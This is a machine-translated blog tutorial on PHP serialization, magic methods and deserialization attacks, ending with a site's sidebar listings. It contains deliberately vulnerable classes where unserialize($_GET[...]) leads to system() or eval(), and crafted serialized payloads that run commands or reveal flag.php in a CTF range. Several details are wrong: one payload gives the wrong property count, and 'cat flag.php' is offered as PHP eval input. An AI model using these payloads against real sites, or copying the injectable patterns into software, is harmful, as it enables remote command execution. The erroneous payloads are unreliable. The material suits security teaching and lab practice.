当前位置:网站首页>PHP deserialization & Magic method
PHP deserialization & Magic method
2022-06-22 13:14:00 【Boring knowledge】
What is deserialization and serialization
serialize : In fact, it is the format of converting objects into arrays or strings
Deserialization : Is to convert an array or string into an object
Let me give you a simple understanding
15 Serialization is equal to 5+5+5
Three 5 The result of adding is constant but equal to 15
Deserialization
5+5+5 Deserialize to 15
Serialization is to split an object into several pieces ,
Deserialization is the combination of fragments to form an object
serialize() // Convert an object to a string
unserialize() // Restore a string to an object
PhP Magic methods 【 a key - Need to recite 】
__construct(): // Constructors , Be the object new It will automatically call
__destruct():// Destructors are called automatically when an object is destroyed
__wakeup(): //unserialize() Will be called automatically
__invoke(): // When you try to call an object in a way that calls a function , Will be called automatically
__call(): // Triggering an invocable method in an object context
__callStatci(): // Triggering an invocable method in a static context
__get(): // Used to read data from inaccessible properties
__set(): // Used to write data to an inaccessible property
__isset(): // Called on an inaccessible property isset() or empty() Trigger
__unset(): // Use on inaccessible properties unset() Trigger when
__toString(): // Triggered when a class is used as a string
__sleep(): //serialize() Function to check if there is a magic method in the class __sleep() If there is , This method will be called first
Serialization vulnerability Demo
<?php
//class Is a class defining , You can understand that it is used to define an object , The format is class Object name { Properties and methods of the content class of the object }
// This demotest Is the defined object name
class demotest{
//public Keyword indicates that a property or method is publicly visible .
// At the same time, it is also a general declaration method of object-oriented languages .
//public: Publicly visible [ Is publicly visible information , This public courseware is not direct F12 You can see ]
//protected: Visible inside the object ( Children of this object can also access )
//;private: The object itself is internally visible ( Does not contain child objects of this object , Or say private Properties and methods are not inherited )
public $name='odw';// name =odw
public $max='man';// Gender = male
public $age='18';// Age =18// If 18 No single quotation marks are numbers int type , Output is i:18
}
$example=new demotest();// Here is the instantiation ,new His role is to instantiate , The format is new+ Instantiate objects , Give the instantiated value to the variable $example
$s=serialize($example);// serialize , Here is serialization ,serialize Is a serialized function , The format is also very simple serialize( Instantiated object ), After serialization, the value is assigned to $s
echo $s.'<br>';
// Finally, here is the output of our serialized object
?>
serialize : Object to string
After serialization, a string is formed
O:8:"demotest":3:{s:4:"name";s:3:"odw";s:3:"max";s:3:"man";s:3:"age";s:2:"18";}
explain
O:8:"demotest":3:{s:4:"name";s:3:"odw";s:3:"max";s:3:"man";s:3:"age";s:2:"18";}
first
O He is equal to object Abbreviation 【object Meaning ?--object= The meaning of the object 】
the second
8 Representative length , It represents the length of the object name ,demotest Is the object name
Third
demotest Is the object name
The fourth one
3,3 What is it? ,3 On behalf of the demotest There are three in this object public Variable / Or there are three variables in the object
The fifth one
s He was string Abbreviation 【string It means string type 】, So string Meaning of string
Sixth
4, This 4 It means length , The length of that , It means demotest The length of the first variable name in the object , The first variable is $name So the length is 4
Seventh
name, This is demotest The name of the first variable in the object
The eighth
s He was string Abbreviation 【string It means string type 】, So string Meaning of string
The ninth
3 This 3 It means length , The length of that , It means demotest The corresponding value of the first variable in the object , The first variable $name=odw The value is three letters, so the length is 3
The tenth
odw, This is demotest The first variable in the object $name=odw The value of the odw This value
The eleventh
s He was string Abbreviation 【string It means string type 】, So string Meaning of string
twelfth
3 This 3 It means length , The length of that , It means demotest The length of the second variable name in the object , The second variable is $odw So the length is 3
thirteenth
max, This is demotest The variable name of the second variable in the object
fourteenth
s He was string Abbreviation 【string It means string type 】, So string Meaning of string
fifteenth
3 This 3 It means length , The length of that , It means demotest The corresponding value of the second variable in the object , The first variable $max=man The value is three letters, so the length is 3
Sixteen
man This is demotest The second variable in the object $max=man The value of the man This value
Seventeen
s He was string Abbreviation 【string It means string type 】, So string Meaning of string
Eighteen
3 This 3 It means length , The length of that , It means demotest The length of the third variable name in the object , The third variable is $ahe So the length is 3
nineteenth
age This is demotest The variable name of the third variable in the object
twentieth
s He was string Abbreviation 【string It means string type 】, So string Meaning of string
twenty-first
2 This 2 It means length , The length of that , It means demotest The corresponding value of the third variable in the object , The third variable $age=18 value 18 Two numbers are therefore 2
twenty-second
18 This is demotest The third variable in the object $age=18 The value of the 18 This value
Serialization security issues
<?php
//class Define an object A
class A{
//public It means being able to recite external references
public $var='echo test';// Here's a variable $var The value in the variable is 'echo test';
public function test(){
// Pass here function To customize a function , The defined function name is test
echo $this->var;// This is also very simple: output $var
}
// Here is a trick to judge the magic method , Look at the underline __destruct() Generally, there are two underscores, which may be the magic method
//__destruct():// Destructors are called automatically when an object is destroyed
public function __destruct(){
echo 'x'.'<br>';
}
// Let's see __construct() How to use this magic method --__construct(): // Constructors , Be the object new It will automatically call
// That is to say, when an object recites new Will trigger the magic method
//$a=new A();
public function __construct(){
echo '__construct'.'<br>';
}
public function __toString(){
return '__toString'.'<br>';
}
}
$a=new A();
?>
Why would it output
__construct and x Well
First of all, the trigger condition of the magic method
__construct(): // Constructors , Be the object new It will automatically call
__destruct():// Destructors are called automatically when an object is destroyed
The first is when the object is new Triggered when called
The second is triggered when the object is destroyed
The explanation here is the same , the second , Why did we trigger when we didn't destroy the object , Here's to say , Basically , When the code ends, the object will be automatically destroyed ,
So as long as the code has __destruct() This magic method , This magic method will be triggered after the code calls the object
The second serialization security issue
<?php
//class Define an object A
class A{
//public It means being able to recite external references
public $var='echo test';// Here's a variable $var The value in the variable is 'echo test';
public function test(){
// Pass here function To customize a function , The defined function name is test
echo $this->var;// This is also very simple: output $var
}
// Here is a trick to judge the magic method , Look at the underline __destruct() Generally, there are two underscores, which may be the magic method
public function __destruct(){
echo 'x'.'<br>';
}
// Let's see __construct() How to use this magic method --__construct(): // Constructors , Be the object new It will automatically call
// That is to say, when an object recites new Will trigger the magic method
//$a=new A();
public function __construct(){
echo '__construct'.'<br>';
}
public function __toString(){
return '__toString'.'<br>';
}
}
// No function required , Create an object to trigger a magic method
$a=new A();// Trigger __construct
echo serialize($a).'<br>';
?>
It's about the first one
O:1:"A":1:{s:3:"var";s:9:"echo test";}
The third serialization security issue
<?php
//class Define an object A
class A{
//public It means being able to recite external references
public $var='echo test';// Here's a variable $var The value in the variable is 'echo test';
public function test(){
// Pass here function To customize a function , The defined function name is test
echo $this->var;// This is also very simple: output $var
}
// Here is a trick to judge the magic method , Look at the underline __destruct() Generally, there are two underscores, which may be the magic method
public function __destruct(){
echo 'x'.'<br>';
}
// Let's see __construct() How to use this magic method --__construct(): // Constructors , Be the object new It will automatically call
// That is to say, when an object recites new Will trigger the magic method
//$a=new A();
public function __construct(){
echo '__construct'.'<br>';
}
public function __toString(){
return '__toString'.'<br>';
}
}
$t=unserialize($_GET['x']);//unserialize It's deserialization
?>
When passed x=O:1:"A":1:{s:3:"var";s:9:"echo test";} When deserializing
Execution appears x
Why?
It's very simple. I said a big score 15 and 5+5+5 It's the same
object A Serialization is O:1:“A”:1:{s:3:“var”;s:9:“echo test”;}
When we call O:1:“A”:1:{s:3:“var”;s:9:“echo test”;} Is to call the object A
When deserialization is complete , Automatic code destruction has reached the magic method destruct() Conditions
<?php
//class Define an object A
class A{
//public It means being able to recite external references
public $var='echo test';// Here's a variable $var The value in the variable is 'echo test';
public function test(){
// Pass here function To customize a function , The defined function name is test
echo $this->var;// This is also very simple: output $var
}
// Here is a trick to judge the magic method , Look at the underline __destruct() Generally, there are two underscores, which may be the magic method
public function __destruct(){
echo 'x'.'<br>';
}
// Let's see __construct() How to use this magic method --__construct(): // Constructors , Be the object new It will automatically call
// That is to say, when an object recites new Will trigger the magic method
//$a=new A();
public function __construct(){
echo '__construct'.'<br>';
}
public function __toString(){
return '__toString'.'<br>';
}
}
$t=unserialize($_GET['x']);
// This is $t The following will also be executed $t->test() function
$t->test();
?>
The fourth serialization security issue
<?php
//class Define an object A
class A{
//public It means being able to recite external references
public $var='echo test';// Here's a variable $var The value in the variable is 'echo test';
public function test(){
// Pass here function To customize a function , The defined function name is test
echo $this->var;// This is also very simple: output $var
}
// Here is a trick to judge the magic method , Look at the underline __destruct() Generally, there are two underscores, which may be the magic method
public function __destruct(){
echo 'x'.'<br>';
}
// Let's see __construct() How to use this magic method --__construct(): // Constructors , Be the object new It will automatically call
// That is to say, when an object recites new Will trigger the magic method
//$a=new A();
public function __construct(){
echo '__construct'.'<br>';
}
public function __toString(){
return '__toString'.'<br>';//__toString(): // Triggered when a class is used as a string
}
}
$a=new A();// Trigger __construct
// Here we use echo $a; This is a string format output will trigger the magic method __toString()
// When we hold echo '$a'; Add a single quotation mark to it int type , It won't trigger __toString()
echo $a;// Trigger __toString
?>
It's easy to operate
Loopholes appear 1
<?php
//class Define an object A
class A{
//public It means being able to recite external references
public $var='echo test';// Here's a variable $var The value in the variable is 'echo test';
public function test(){
// Pass here function To customize a function , The defined function name is test
echo $this->var;// This is also very simple: output $var
}
// Here is a trick to judge the magic method , Look at the underline __destruct() Generally, there are two underscores, which may be the magic method
public function __destruct(){
system ('ipconfig');// Change to sysem Authority to execute ipconfig
}
// Let's see __construct() How to use this magic method --__construct(): // Constructors , Be the object new It will automatically call
// That is to say, when an object recites new Will trigger the magic method
//$a=new A();
public function __construct(){
echo '__construct'.'<br>';
}
public function __toString(){
return '__toString'.'<br>';
}
}
// No function required , Create an object to trigger a magic method
$a=new A();// Trigger __construct
?>
Loopholes appear 2
<?php
//class Define an object A
class A{
//public It means being able to recite external references
public $cmd='ipconfig';
public function test(){
// Pass here function To customize a function , The defined function name is test
echo $this->cmd;// This is also very simple: output $cmd
}
// Here is a trick to judge the magic method , Look at the underline __destruct() Generally, there are two underscores, which may be the magic method
public function __destruct(){
system ($this->cmd);// This is execution $cmd,$cmd The value of is ipconfig, In short, it is to execute ipconfig
}
// Let's see __construct() How to use this magic method --__construct(): // Constructors , Be the object new It will automatically call
// That is to say, when an object recites new Will trigger the magic method
//$a=new A();
public function __construct(){
echo '__construct'.'<br>';
}
public function __toString(){
return '__toString'.'<br>';
}
}
// No function required , Create an object to trigger a magic method
$a=new A();// Trigger __construct
?>
Loopholes appear 3
<?php
class A{
public $cmd='ipconfig';
public function __destruct()
{
system($this->cmd);
}
public function __construct()
{
echo '123'.'<br>';
}
}
// Function reference , No object to create contact magic method custom variable
//
unserialize($_GET['x']);
?>
This time, we will create a serialized string for the website to deserialize my string
Come as you want
1
O He is equal to object Abbreviation 【object Meaning ?--object= The meaning of the object 】
2
A The object name length is 1
3
A Object name
4
1 There is a variable in the object
5
s Represents string type
6
3 The first variable is named cmd Three letters
7
cmd The name of the first variable
8
s String type , This gives the string type the type of variable execution , The last string type is the name of the variable
9
8 Indicates how many digits the variable value is equal to
10
ipconfig Express $cmd= The corresponding value is ipconfig
So we will synthesize the above into
O:1:"A":1:{s:3:"cmd";s:8:"ipconfig";}
Let's try ipconfig Change to www.baidu.com
O:1:"A":3:{s:3:"cmd";s:18:"ping www.baidu.com";}
Both spaces and dots count as one place
shooting range
https://github.com/fine-1/php-SER-libs
1
<?php
highlight_file(__FILE__);
class a{
var $act;
function action(){
eval($this->act);
}
}
$a=unserialize($_GET['flag']);// Deserialization comes from flag The data of
$a->action();// perform $a And implement action()
?>
We need to construct our own string
O:1:"a":1:{s:3:"act";s:24:"show_source('flag.php');";}
show_source Is to highlight flag.php Content
You don't want to take flag.php Content
use cat flag.php It's fine too
O:1:"a":1:{s:3:"act";s:12:"cat flag.php";}
2
This level is relatively simple
<?php
highlight_file(__FILE__);
include("flag.php");
class mylogin{
var $user;
var $pass;
function __construct($user,$pass){
$this->user=$user;
$this->pass=$pass;
}
function login(){
if ($this->user=="daydream" and $this->pass=="ok"){
return 1;
// Just deserialize user=="daydream" and $this->pass=="ok" That's all right.
}
}
}
$a=unserialize($_GET['param']);
if($a->login())
{
echo $flag;
}
?>
O:7:"mylogin":2:{s:4:"user";s:8:"daydream";s:4:"pass";s:2:"ok";}
边栏推荐
猜你喜欢
A2L file analysis based on CAN bus (1)
MySQL notes
SAP system license viewing application and import
Arcpy 添加图层到地图文档
SICF批量激活服务节点
Reconstruction practice of complex C-end project of acquisition technology
AcWing第53场周赛
leetcode 968.监控二叉树
leetcode 85. 最大矩形
Tianyi cloud digital government smart data center has passed the certification
随机推荐
Secondary development of robotframework -- socket push real-time log
RF5.0新内容速看
MySQL 5.7 + Navicat download and installation tutorial (with installation package)
MySQL notes
termux设置电脑连接手机。(敲打命令贼快),手机termux端口8022
Sequoiadb distributed database may 2022 issue
Arcpy 添加图层到地图文档
934. Shortest Bridge
Secondary development of robotframework - real time log
天坑专业学IC设计自学的话有公司会要吗
155. Min Stack
Hurun Research Institute launched the list of potential enterprises of China's meta universe, and Jushan database was selected as the future star enterprise
Reddit product director: a practical guide for NFT members for Web3 creators
Help financial informatization innovation, Jushan database has won more than 50 financial customers recently
AcWing第55场周赛
测试方法论——数据驱动测试
Pycharm shell script cannot be run
Leetcode 297 match de la semaine
130. Surrounded Regions
Fluentd is easy to get started. Combined with the rainbow plug-in market, log collection is faster